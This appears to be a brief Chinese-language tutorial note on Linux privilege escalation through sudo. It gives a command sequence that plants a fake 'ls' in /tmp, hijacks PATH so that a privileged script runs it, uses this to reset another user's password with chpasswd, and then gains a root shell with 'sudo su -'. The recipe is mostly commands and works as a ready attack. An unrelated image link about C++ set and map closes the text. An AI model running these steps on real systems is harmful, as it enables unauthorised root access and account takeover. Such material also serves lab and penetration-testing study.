利用SUDO实现提权
利用用户的sudo授权获得root的shell
cat /etc/passwd
cat /etc/sudoers 命令没有权限
echo "cat /etc/sudoers" >/tmp/ls
chmod 755 /tmp/ls
export PATH=/tmp:$PATH
/home/user5/script
想办法更改user1的口令
echo 'echo "user1:xiaoxiao" | chpasswd ' >/tmp/ls
调用user5的脚本:/home/user5/script
su - user1切换user1用户 密码则为设置的xiaoxiao:
后直接提权到root用户:sudo su -
![[C++]18:set和map的使用](https://img-blog.csdnimg.cn/direct/f42e5f0bc9d34349a6ae4386cec324ff.png)
